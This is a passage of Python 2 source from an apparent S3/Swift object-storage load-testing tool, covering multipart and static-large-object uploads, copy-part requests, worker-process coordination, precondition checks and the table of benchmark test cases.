if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
if resp.status.startswith('200 '):
parts_record += '%d:%s,' % (i, resp.return_data)
upload_id.append(parts_record)
# Record per-part info to the local file parts_etag-x.dat, format: bucket\tobject\tupload_id\tpartNo:Etag,partNo:Etag,...
part_record_file = 'data/parts_etag-%d.dat' % process_id
parts_record_writer = None
parts_records = ''
for upload_id in upload_ids:
parts_records += '\t'.join(upload_id) + '\n'
try:
parts_record_writer = open(part_record_file, 'w')
parts_record_writer.write(parts_records)
except Exception, data:
logging.error('process [%d] write file %s error, %s' % (process_id, part_record_file, data))
finally:
if parts_record_writer:
try:
parts_record_writer.close()
except IOError:
pass
def swiftupload_static_big_object(process_id, user, conn, result_queue):
# Upload the numbered segments of a swift static large object, then PUT the assembled
# manifest with ?multipart-manifest=put so the object is created from those segments.
fixed_size = False
request_type = 'swiftUploadStaticBigObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk)
rest.headers['content-type'] = 'application/octet-stream'
rest.headers['X-auth-token'] = user.sk
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.prefixkey = CONFIG['ObjectNameFixed']
range_arr = range(0, CONFIG['BucketsPerUser'])
# Stagger each thread's starting bucket to avoid a single-bucket performance bottleneck.
if CONFIG['AvoidSinBkOp']:
range_arr = range(process_id % CONFIG['BucketsPerUser'], CONFIG['BucketsPerUser']) + range(0,process_id % CONFIG['BucketsPerUser'])
for i in range_arr:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
rest.prefixkey = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
fixed_size = False
parts_for_static_big = CONFIG['PartsForEachUploadID']
k=1
manifest=''
rest.queryArgs={}
rest.sendContent=''
for k in range(1,parts_for_static_big+1):
if not fixed_size:
# change size every request for the same obj.
rest.contentLength, fixed_size = Util.generate_a_size(CONFIG['PartSize'])
rest.key = '%s-%d'%(rest.prefixkey,k)
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, 'MD5:' + str(resp.content_md5),
resp.request_id, resp.status))
# If the request succeeded, record return_data (the segment ETag) in the manifest entry below.
onemanifest =''
if resp.status.startswith('20'):
onemanifest = '"path":"'+rest.bucket+'/'+rest.key+'",'
onemanifest += '"etag":"'+resp.return_data+'",'
onemanifest += '"size_bytes":'+str(rest.contentLength)
manifest +='{'+onemanifest+'},'
manifest = manifest[:-1]
manifest = '['+manifest+']'
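# Sketch of the assembled SLO manifest sent below (all values illustrative):
# [{"path":"ak0.bucket.0/obj-0-0-1","etag":"d41d8cd98f00b204","size_bytes":5242880},
#  {"path":"ak0.bucket.0/obj-0-0-2","etag":"9e107d9d372bb682","size_bytes":5242880}]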
rest.queryArgs['multipart-manifest'] ="PUT"
rest.key = rest.prefixkey
rest.sendContent=manifest
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def swiftdelete_static_big_object(process_id, user, conn, result_queue):
request_type = 'swiftDeleteStaticBigObject'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk)
rest.headers['content-type'] = 'application/octet-stream'
rest.headers['X-auth-token'] = user.sk
if CONFIG['BucketNameFixed']:
rest.bucket = CONFIG['BucketNameFixed']
if CONFIG['ObjectNameFixed']:
rest.prefixkey = CONFIG['ObjectNameFixed']
range_arr = range(0, CONFIG['BucketsPerUser'])
# Stagger each thread's starting bucket to avoid a single-bucket performance bottleneck.
if CONFIG['AvoidSinBkOp']:
range_arr = range(process_id % CONFIG['BucketsPerUser'], CONFIG['BucketsPerUser']) + range(0,process_id % CONFIG['BucketsPerUser'])
for i in range_arr:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
rest.queryArgs['multipart-manifest'] ="DELETE"
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def copy_part(process_id, user, conn, result_queue):
# OBJECTS must be supplied as the copy source; otherwise there is nothing to copy.
global OBJECTS
if not OBJECTS:
logging.error("can not find source object, exit")
return
# Load the upload_ids this process must handle from local files. To support several threads uploading
# parts of the same upload_id, upload_ids initialized by other processes of the same user are loaded too.
# E.g. with 5 users and 2 threads per user, each upload_id can be fed by at most 2 part-upload threads:
# upload_id-0(usr0,p0) upload_id-1(usr0,p1) upload_id-2(usr1,p2) upload_id-3(usr1,p3) upload_id-4(usr2,p4)
# upload_id-5(usr2,p5) upload_id-6(usr3,p6) upload_id-7(usr3,p7) upload_id-8(usr4,p8) upload_id-9(usr4,p9)
# p0 and p1 load usr0,p0 and usr0,p1 in order.
upload_ids = []
if not CONFIG['ConcurrentUpParts']:
id_files = [process_id]
else:
id_files = range(process_id / CONFIG['ThreadsPerUser'] * CONFIG['ThreadsPerUser'],
(process_id / CONFIG['ThreadsPerUser'] + 1) * CONFIG['ThreadsPerUser'])
for i in id_files:
upload_id_file = 'data/upload_id-%d.dat' % i
try:
with open(upload_id_file, 'r') as fd:
for line in fd:
if line.strip() == '':
continue
# Skip upload_ids that were not initialized by this thread's user.
if not line.startswith(user.username + '\t'):
continue
if len(line.split('\t')) != 4:
logging.warn('upload_ids record error [%s]' % line)
continue
# Keep the process number i that originally created this upload_id.
upload_ids.append((str(i) + '.' + line.strip()).split('\t'))
fd.close()
logging.info('process %d load upload_ids file %s end' % (process_id, upload_id_file))
except Exception, data:
logging.error("load %s for process %d error, [%r], exit" % (upload_id_file, process_id, data))
continue
if not upload_ids:
logging.info("load no upload_id for process %d, exit" % process_id)
return
fixed_size = False
request_type = 'CopyPart'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
if CONFIG['copySrcSrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-copy-source-server-side-encryption-customer-algorithm'] = 'AES256'
parts_record = ''
for upload_id in upload_ids:
rest.bucket = upload_id[1]
rest.key = upload_id[2]
rest.queryArgs['uploadId'] = upload_id[3]
# When concurrent part upload is enabled, this thread handles only a subset of the parts.
if not CONFIG['ConcurrentUpParts']:
part_ids = range(1, CONFIG['PartsForEachUploadID'] + 1)
else:
part_ids = range(process_id % CONFIG['ThreadsPerUser'] + 1, CONFIG['PartsForEachUploadID'] + 1,
CONFIG['ThreadsPerUser'])
logging.debug('process %d handle parts: %r' % (process_id, part_ids))
if not part_ids:
logging.info(
'process %d has no parts to do for upload_id %s, break' % (process_id, rest.queryArgs['uploadId']))
continue
for i in part_ids:
rest.queryArgs['partNumber'] = str(i)
if not fixed_size:
range_size, fixed_size = Util.generate_a_size(CONFIG['PartSize'])
rest.headers['x-amz-copy-source'] = '/%s' % random.choice(OBJECTS)
range_start_index = random.randint(0, range_size * (CONFIG['PartsForEachUploadID'] - 1))
logging.debug('range_start_index:%d' % range_start_index)
rest.headers['x-amz-copy-source-range'] = 'bytes=%d-%d' % (
range_start_index, range_start_index + range_size - 1)
logging.debug('x-amz-copy-source-range:[%s]' % rest.headers['x-amz-copy-source-range'])
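# Worked example (assumed values): if generate_a_size() yields range_size=5242880 (5 MB) and
# PartsForEachUploadID=4, range_start_index is drawn from [0, 15728640] and a draw of 7340032
# produces x-amz-copy-source-range "bytes=7340032-12582911".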
# Add the server-side encryption headers.
if CONFIG['copySrcSrvSideEncryptType'].lower() == 'sse-c':
src_en_key = rest.headers['x-amz-copy-source'].split('/')[2][-32:].zfill(32)
rest.headers['x-amz-copy-source-server-side-encryption-customer-key'] = base64.b64encode(src_en_key)
rest.headers['x-amz-copy-source-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(src_en_key).digest())
logging.debug('src encrpt key: %s, src encrypt key md5: %s' % (
src_en_key, rest.headers['x-amz-copy-source-server-side-encryption-customer-key-MD5']))
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
# As with CopyObject, a 200 OK from the copy-part request does not by itself mean the copy succeeded. If 200 is returned but no ETag was obtained, change the status to a 500 error.
if resp.status.startswith('200 ') and not resp.return_data:
logging.info('response 200 OK without ETag, set status code 500 InternalError')
resp.status = '500 InternalError'
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes,
'src:' + rest.headers['x-amz-copy-source'] + ':' + rest.headers[
'x-amz-copy-source-range'], resp.request_id, resp.status))
if resp.status.startswith('200 '):
parts_record += '%d:%s,' % (i, resp.return_data)
upload_id.append(parts_record)
# Record per-part info to the local file parts_etag-x.dat, format: bucket\tobject\tupload_id\tpartNo:Etag,partNo:Etag,...
part_record_file = 'data/parts_etag-%d.dat' % process_id
parts_record_writer = None
parts_records = ''
for upload_id in upload_ids:
parts_records += '\t'.join(upload_id) + '\n'
try:
parts_record_writer = open(part_record_file, 'w')
parts_record_writer.write(parts_records)
except Exception, data:
logging.error('process [%d] write file %s error, %s' % (process_id, part_record_file, data))
finally:
if parts_record_writer:
try:
parts_record_writer.close()
except IOError:
pass
def complete_multi_upload(process_id, user, conn, result_queue):
# Load the upload_ids this process must complete from the local parts_etag-x.dat files. Because several
# threads may have uploaded parts of the same upload_id, part records written by other processes are loaded too.
# E.g. with 3 users, 3 threads per user and 6 parts per upload_id, each upload_id gets 3 part-upload threads,
# each of which uploads 2 parts per upload_id:
# parts_etag-0(usr0,p0,part1/4) parts_etag-1(usr0,p1,part2/5) parts_etag-2(usr1,p2,part3/6)
# parts_etag-3(usr1,p3,part1/4) parts_etag-4(usr0,p4,part2/5) parts_etag-5(usr1,p5,part3/6)
# parts_etag-0(usr2,p6,part1/4) parts_etag-1(usr0,p7,part2/5) parts_etag-2(usr1,p8,part3/6)
# p0, p1 and p2 load parts_etag-0, parts_etag-1 and parts_etag-2 in order, keeping only their own objects.
part_etags = {}
if not CONFIG['ConcurrentUpParts']:
part_files = [process_id]
else:
part_files = range(process_id / CONFIG['ThreadsPerUser'] * CONFIG['ThreadsPerUser'],
(process_id / CONFIG['ThreadsPerUser'] + 1) * CONFIG['ThreadsPerUser'])
for i in part_files:
part_record_file = 'data/parts_etag-%d.dat' % i
try:
with open(part_record_file, 'r') as fd:
for line in fd:
if line.strip() == '':
continue
if not line.startswith('%d.%s\t' % (process_id, user.username)):
continue
line_array = line.strip().split('\t')
if len(line_array) != 5 or not line_array[4]:
logging.warn('partEtag record error [%s]' % line)
continue
# Record format: username\tbucket\tobject\tuploadID\tpartNo:etag,partNo:etag,...
# Merge part records uploaded by different threads for the same upload_id.
if line_array[3] in part_etags:
part_etags[line_array[3]] = (
line_array[1], line_array[2], line_array[4] + part_etags[line_array[3]][2])
else:
part_etags[line_array[3]] = (line_array[1], line_array[2], line_array[4])
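# Illustrative merge: if parts_etag-0 contributed "1:etagA,3:etagC," and parts_etag-1 contributes
# "2:etagB," for the same uploadId, part_etags[uploadId] becomes (bucket, key, "2:etagB,1:etagA,3:etagC,");
# the part order is restored later by sorted(parts_dict).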
fd.close()
logging.debug('process %d load parts_etag file %s end' % (process_id, part_record_file))
except Exception, data:
logging.info(
"load parts_etag from file %s for process %d error, [%r], exit" % (part_record_file, process_id, data))
continue
if not part_etags:
logging.error('process %d load nothing from files %r ' % (process_id, part_files))
return
request_type = 'CompleteMultiUpload'
rest = s3PyCmd.S3RequestDescriptor(request_type, ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.headers['content-type'] = 'application/xml'
for key, value in part_etags.items():
rest.bucket = value[0]
rest.key = value[1]
rest.queryArgs['uploadId'] = key
# Sort the part records.
parts_dict = {}
for item in value[2].split(','):
if ':' in item:
parts_dict[int(item.split(':')[0])] = item.split(':')[1]
# Assemble the XML body.
if not parts_dict:
continue
rest.sendContent = '<CompleteMultipartUpload>'
for part_index in sorted(parts_dict):
if not parts_dict[part_index]:
continue
rest.sendContent += '<Part><PartNumber>%d</PartNumber><ETag>%s</ETag></Part>' % (
part_index, parts_dict[part_index])
rest.sendContent += '</CompleteMultipartUpload>'
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, request_type, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
def multi_parts_upload(process_id, user, conn, result_queue):
rest = s3PyCmd.S3RequestDescriptor(request_type='', ak=user.ak, sk=user.sk,
auth_algorithm=CONFIG['AuthAlgorithm'], virtual_host=CONFIG['VirtualHost'],
domain_name=CONFIG['DomainName'], region=CONFIG['Region'])
rest.bucket = CONFIG['BucketNameFixed']
rest.key = CONFIG['ObjectNameFixed']
i = 0
while i < CONFIG['BucketsPerUser']:
if not CONFIG['BucketNameFixed']:
rest.bucket = '%s.%s.%d' % (user.ak.lower(), CONFIG['BucketNamePrefix'], i)
i += 1
j = 0
while j < CONFIG['ObjectsPerBucketPerThread']:
if not CONFIG['ObjectNameFixed']:
rest.key = CONFIG['ObjectNamePartten'].replace('processID', str(process_id)).replace('Index',
str(j)).replace(
'ObjectNamePrefix', CONFIG['ObjectNamePrefix'])
j += 1
            # 1. Initiate the multipart upload task for this object.
rest.requestType = 'InitMultiUpload'
rest.method = 'POST'
rest.headers = {}
rest.queryArgs = {}
rest.sendContent = ''
rest.queryArgs['uploads'] = None
if CONFIG['PutWithACL']:
rest.headers['x-amz-acl'] = CONFIG['PutWithACL']
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
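                # SSE-C requires the base64-encoded 256-bit customer key plus the base64-encoded MD5
                # digest of the raw key bytes; here the key is simply derived from the object name for test purposes.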
rest.headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
elif CONFIG['SrvSideEncryptType'].lower() == 'sse-kms' and CONFIG[
'SrvSideEncryptAlgorithm'].lower() == 'aws:kms':
rest.headers['x-amz-server-side-encryption'] = 'aws:kms'
if CONFIG['SrvSideEncryptAWSKMSKeyId']:
rest.headers['x-amz-server-side-encryption-aws-kms-key-id'] = CONFIG['SrvSideEncryptAWSKMSKeyId']
if CONFIG['SrvSideEncryptContext']:
rest.headers['x-amz-server-side-encryption-context'] = CONFIG['SrvSideEncryptContext']
elif CONFIG['SrvSideEncryptType'].lower() == 'sse-kms' and CONFIG[
'SrvSideEncryptAlgorithm'].lower() == 'aes256':
rest.headers['x-amz-server-side-encryption'] = 'AES256'
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, rest.requestType, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
upload_id = resp.return_data
logging.info("upload id: %s" % upload_id)
            # 2. Upload the parts serially
rest.requestType = 'UploadPart'
rest.method = 'PUT'
rest.headers = {}
rest.queryArgs = {}
rest.sendContent = ''
rest.headers['content-type'] = 'application/octet-stream'
rest.queryArgs['uploadId'] = upload_id
part_number = 1
fixed_size = False
part_etags = {}
while part_number <= CONFIG['PartsForEachUploadID']:
rest.queryArgs['partNumber'] = str(part_number)
if CONFIG['SrvSideEncryptType'].lower() == 'sse-c':
rest.headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
rest.headers['x-amz-server-side-encryption-customer-key'] = base64.b64encode(
rest.key[-32:].zfill(32))
rest.headers['x-amz-server-side-encryption-customer-key-MD5'] = base64.b64encode(
hashlib.md5(rest.key[-32:].zfill(32)).digest())
if not fixed_size:
rest.contentLength, fixed_size = Util.generate_a_size(CONFIG['PartSize'])
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request(cal_md5=CONFIG['CalHashMD5'])
result_queue.put(
(process_id, user.username, rest.url, rest.requestType, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
if resp.status.startswith('200 '):
part_etags[part_number] = resp.return_data
part_number += 1
            # 3. Complete (merge) the uploaded parts
rest.requestType = 'CompleteMultiUpload'
rest.method = 'POST'
rest.headers = {}
rest.queryArgs = {}
rest.headers['content-type'] = 'application/xml'
rest.queryArgs['uploadId'] = upload_id
rest.sendContent = '<CompleteMultipartUpload>'
for part_index in sorted(part_etags):
rest.sendContent += '<Part><PartNumber>%d</PartNumber><ETag>%s</ETag></Part>' % (
part_index, part_etags[part_index])
rest.sendContent += '</CompleteMultipartUpload>'
resp = s3PyCmd.S3RequestHandler(rest, conn).make_request()
result_queue.put(
(process_id, user.username, rest.url, rest.requestType, resp.start_time,
resp.end_time, resp.send_bytes, resp.recv_bytes, '', resp.request_id, resp.status))
# Entry point for each concurrent worker process
def start_process(process_id, user, test_case, results_queue, valid_start_time, valid_end_time, current_threads, lock,
conn=None, call_itself=False):
global OBJECTS, CONFIG
    # When called by the mixed-operation case itself, do not count an extra user and do not wait.
if not call_itself:
lock.acquire()
current_threads.value += 1
lock.release()
        # Wait for all users to start
while True:
            # If the start time has already been set by another process, skip this step.
if valid_start_time.value == float(sys.maxint):
                # Once all users have started, record the valid start time.
if current_threads.value == CONFIG['Threads']:
valid_start_time.value = time.time() + 2
else:
time.sleep(.06)
else:
break
time.sleep(2)
    # Allocate a connection (long-connection mode). For the repeated mixed-operation scenario,
    # do not allocate a new connection if one already exists.
if not conn:
conn = s3PyCmd.MyHTTPConnection(host=CONFIG['OSCs'], is_secure=CONFIG['IsHTTPs'],
ssl_version=CONFIG['sslVersion'], timeout=CONFIG['ConnectTimeout'],
serial_no=process_id, long_connection=CONFIG['LongConnection'],
conn_header=CONFIG['ConnectionHeader'])
from swiftIamTool import RestRequest
rest = RestRequest()
if test_case != 900:
try:
method_to_call = globals()[TESTCASES[test_case].split(';')[1]]
logging.debug('method %s called ' % method_to_call)
method_to_call(process_id, user, conn, results_queue)
except KeyboardInterrupt:
pass
except Exception, e:
logging.error('Call method for test case %d except: %s' % (test_case, e))
elif test_case == 900:
test_cases = [int(case) for case in CONFIG['MixOperations'].split(',')]
tmp = 0
while tmp < CONFIG['MixLoopCount']:
t1,t2,t3,t4=rest.GetUserToken(username=user.username)
print "t1================================================================================="+t1+"|"+t3
logging.debug("loop count: %d " % tmp)
tmp += 1
for case in test_cases:
logging.debug("case %d in mix loop called " % case)
start_process(process_id, user, case, results_queue, valid_start_time,
valid_end_time, current_threads, lock, conn, True)
    # When called by the mixed-operation case itself, return directly without closing the connection or decrementing the user count.
if call_itself:
return
# close connection for this thread
if conn:
conn.close_connection()
    # After finishing the workload, if this is the first worker to exit, record the valid end time.
if current_threads.value == CONFIG['Threads']:
valid_end_time.value = time.time()
logging.info('thread [' + str(process_id) + '], exit, set valid_end_time = ' + str(valid_end_time.value))
    # Exit
lock.acquire()
current_threads.value -= 1
lock.release()
logging.info('process_id [%d] exit, set current_threads.value = %d' % (process_id, current_threads.value))
def get_total_requests():
global OBJECTS, CONFIG
if CONFIG['Testcase'] == 100:
return CONFIG['RequestsPerThread'] * CONFIG['Threads']
elif CONFIG['Testcase'] in (101, 103, 104, 105, 106, 111, 112, 141, 142, 143, 151, 152, 153):
return CONFIG['BucketsPerUser'] * CONFIG['Users']
elif CONFIG['Testcase'] in (201,):
return CONFIG['ObjectsPerBucketPerThread'] * CONFIG['BucketsPerUser'] * CONFIG['Threads'] * CONFIG[
'PutTimesForOneObj']
elif CONFIG['Testcase'] in (202, 203, 204, 206, 207, 211):
if len(OBJECTS) > 0:
return len(OBJECTS)
        # If object version data was loaded from the data directory, the total is unknown.
if CONFIG['Testcase'] in (202, 204):
for i in range(CONFIG['Threads']):
obj_v_file = 'data/objv-%d.dat' % i
if os.path.exists(obj_v_file) and os.path.getsize(obj_v_file) > 0:
return -1
return CONFIG['ObjectsPerBucketPerThread'] * CONFIG['BucketsPerUser'] * CONFIG['Threads']
elif CONFIG['Testcase'] in (205,):
return int((CONFIG['ObjectsPerBucketPerThread'] + CONFIG['DeleteObjectsPerRequest'] - 1) / CONFIG[
'DeleteObjectsPerRequest']) * CONFIG['BucketsPerUser'] * CONFIG['Threads']
elif CONFIG['Testcase'] in (216,):
return CONFIG['ObjectsPerBucketPerThread'] * CONFIG['BucketsPerUser'] * CONFIG['Threads'] * (
2 + CONFIG['PartsForEachUploadID'])
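        # e.g. 10 objects per bucket per thread, 2 buckets per user, 4 threads and 5 parts per
        # upload id -> 10 * 2 * 4 * (2 + 5) = 560 requests (init + 5 parts + complete per object).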
    # For some request types the total number of requests cannot be computed; return -1
else:
return -1
# return True: pass, False: failed
def precondition():
global CONFIG, TESTCASES
    # Check whether the current user is root
import getpass
import platform
if 'root' != getpass.getuser() and platform.system().lower().startswith('linux'):
return False, "\033[1;31;40m%s\033[0m Please run with root account other than '%s'" % (
"[ERROR]", getpass.getuser())
    # Check whether the test case is supported
if CONFIG['Testcase'] not in TESTCASES:
return False, "\033[1;31;40m%s\033[0m Test Case [%d] not supported" % ("[ERROR]", CONFIG['Testcase'])
    # If server-side encryption is enabled, HTTPS + AWSV4 must be used
if CONFIG['SrvSideEncryptType']:
if not CONFIG['IsHTTPs']:
CONFIG['IsHTTPs'] = True
logging.info('change IsHTTPs to True while use SrvSideEncryptType')
if CONFIG['AuthAlgorithm'] != 'AWSV4':
CONFIG['AuthAlgorithm'] = 'AWSV4'
logging.info('change AuthAlgorithm to AWSV4 while use SrvSideEncryptType')
    # Load users and check that enough users are available
logging.info('loading users...')
read_users()
if CONFIG['Users'] > len(USERS):
return False, "\033[1;31;40m%s\033[0m Not enough users in users.dat after index %d: %d < [Users=%d]" % (
"[ERROR]", CONFIG['UserStartIndex'], len(USERS), CONFIG['Users'])
    # Test network connectivity
if CONFIG['IsHTTPs']:
try:
import ssl as ssl
if not CONFIG['sslVersion']:
CONFIG['sslVersion'] = 'SSLv23'
logging.info('import ssl module done, config ssl Version: %s' % CONFIG['sslVersion'])
except ImportError:
logging.info('import ssl module error')
            return False, 'Python version %s, import ssl module error' % sys.version.split()[0]
oscs = CONFIG['OSCs'].split(',')
for end_point in oscs:
print 'Testing connection to %s\t' % end_point.ljust(20),
sys.stdout.flush()
test_conn = None
try:
test_conn = s3PyCmd.MyHTTPConnection(host=end_point, is_secure=CONFIG['IsHTTPs'],
ssl_version=CONFIG['sslVersion'], timeout=60, serial_no=0,
long_connection=True)
test_conn.connect_connection()
ssl_ver = ''
if CONFIG['IsHTTPs']:
if Util.compareVersion(sys.version.split()[0], '2.7.9') < 0:
ssl_ver = test_conn.connection.sock._sslobj.cipher()[1]
else:
ssl_ver = test_conn.connection.sock._sslobj.version()
rst = '\033[1;32;40mSUCCESS %s\033[0m'.ljust(10) % ssl_ver
else:
rst = '\033[1;32;40mSUCCESS\033[0m'.ljust(10)
print rst
logging.info(
'connect %s success, python version: %s, ssl_ver: %s' % (
end_point, sys.version.replace('\n', ' '), ssl_ver))
except Exception, data:
logging.error('Caught exception when testing connection with %s, except: %s' % (end_point, data))
print '\033[1;31;40m%s *%s*\033[0m' % (' Failed'.ljust(8), data)
return False, 'Check connection failed'
finally:
if test_conn:
test_conn.close_connection()
    # Create the data directory
if not os.path.exists('data'):
os.mkdir('data')
return True, 'check passed'
def get_objects_from_file(file_name):
global OBJECTS
if not os.path.exists(file_name):
print 'ERROR,the file configed %s in config.dat not exist' % file_name
sys.exit(0)
try:
with open(file_name, 'r') as fd:
for line in fd:
if line.strip() == '':
continue
if len(line.split(',')) != 12:
continue
if line.split(',')[2][1:].find('/') == -1:
continue
if line.split(',')[11].strip().startswith('200 OK'):
OBJECTS.append(line.split(',')[2][1:])
fd.close()
logging.info('load file %s end, get objects [%d]' % (file_name, len(OBJECTS)))
except Exception, data:
msg = 'load file %s except, %s' % (file_name, data)
logging.error(msg)
print msg
sys.exit()
if len(OBJECTS) == 0:
print 'get no objects in file %s' % file_name
sys.exit()
# running config
CONFIG = {}
# test users
USERS = []
OBJECTS = []
TESTCASES_SWIFT = {100: 'swiftListUserContainers;swiftlist_user_containers',
101: 'swiftCreateContainer;swiftcreate_container',
102: 'swiftListObjectsInContainer;swiftlist_objects_in_container',
103: 'swiftHeadContainer;swifthead_container',
104: 'swiftDeleteContainer;swiftdelete_container',
201: 'swiftPutObject;swiftput_object',
202: 'swiftGetObject;swiftget_object',
203: 'swiftHeadObject;swifthead_object',
204: 'swiftDeleteObject;swiftdelete_object',
217: 'swiftUploadDynamicBigObject;swiftupload_dynamic_big_object',
218: 'swiftUploadStaticBigObject;swiftupload_static_big_object',
219: 'swiftDeleteDynamicBigObject;swiftdelete_dynamic_big_object',
220: 'swiftDeleteStaticBigObject;swiftdelete_static_big_object',
900: 'MixOperation;',
}
TESTCASES = {100: 'ListUserBuckets;list_user_buckets',
101: 'CreateBucket;create_bucket',
102: 'ListObjectsInBucket;list_objects_in_bucket',
103: 'HeadBucket;head_bucket',
104: 'DeleteBucket;delete_bucket',
105: 'BucketDelete;bucket_delete',
106: 'OptionsBucket;options_bucket',
             111: 'PutBucketVersioning;put_bucket_versioning',
112: 'GetBucketVersioning;get_bucket_versioning',
141: 'PutBucketWebsite;put_bucket_website',
142: 'GetBucketWebsite;get_bucket_website',
143: 'DeleteBucketWebsite;delete_bucket_website',
151: 'PutBucketCors;put_bucket_cors',
152: 'GetBucketCors;get_bucket_cors',
153: 'DeleteBucketCors;delete_bucket_cors',
161: 'PutBucketTag;put_bucket_tag',
162: 'GetBucketTag;get_bucket_tag',
163: 'DeleteBucketTag;delete_bucket_tag',
201: 'PutObject;put_object',
202: 'GetObject;get_object',
203: 'HeadObject;head_object',
204: 'DeleteObject;delete_object',
205: 'DeleteMultiObjects;delete_multi_objects',
206: 'CopyObject;copy_object',
207: 'RestoreObject;restore_object',
211: 'InitMultiUpload;init_multi_upload',
212: 'UploadPart;upload_part',
213: 'CopyPart;copy_part',
214: 'CompleteMultiUpload;complete_multi_upload',
215: 'AbortMultiUpload;abort_multi_upload',
216: 'MultiPartsUpload;multi_parts_upload',
900: 'MixOperation;'
}
TESTCASES=TESTCASES_SWIFT
if __name__ == '__main__':
if not os.path.exists('log'):
os.mkdir('log')
logging.config.fileConfig('logging.conf')
version = '----------------s3PyTool: v20170215, Python: %s----------------' % sys.version.split(' ')[0]
logging.info(version)
print version
    # Load the specified config file
logging.info('loading config...')
config_file = 'config.dat'
if len(sys.argv[1:]) > 2:
config_file = sys.argv[1:][2]
read_config(config_file)
print 'Config loaded'
print str(CONFIG).replace('\'', '')
logging.info(CONFIG)
    # If command-line arguments are given, they override the config file.
if len(sys.argv[1:]) > 0:
CONFIG['Testcase'] = int(sys.argv[1:][0])
if len(sys.argv[1:]) > 1:
CONFIG['Users'] = int(sys.argv[1:][1])
CONFIG['Threads'] = CONFIG['Users'] * CONFIG['ThreadsPerUser']
    # Pre-start checks
check_result, msg = precondition()
if not check_result:
print 'Check error, [%s] \nExit...' % msg
sys.exit()
if CONFIG['objectDesFile']:
        # Check the operation type; other operations do not pre-read the file even if objectDesFile is configured
obj_op = ['202', '203', '204', '213']
if str(CONFIG['Testcase']) in obj_op or (
CONFIG['Testcase'] == 900 and (set(CONFIG['MixOperations'].split(',')) & set(obj_op))):
print 'begin to read object file %s' % CONFIG['objectDesFile']
get_objects_from_file(CONFIG['objectDesFile'])
print 'finish, get %d objects' % len(OBJECTS)
start_wait = False
if start_wait:
tip = '''
--------------------------------------------------------------------------------
Important: This is the way how we can run multi-clients at the same time.
Assuming all the client nodes are sync with the time server.
If now 02:10:00, enter 12 to change the minute, then it will start at 02:12:00
--------------------------------------------------------------------------------
'''
print '\033[1;32;40m%s\033[0m' % tip
import threading
def input_func(input_data):
input_data['data'] = raw_input()
while False:
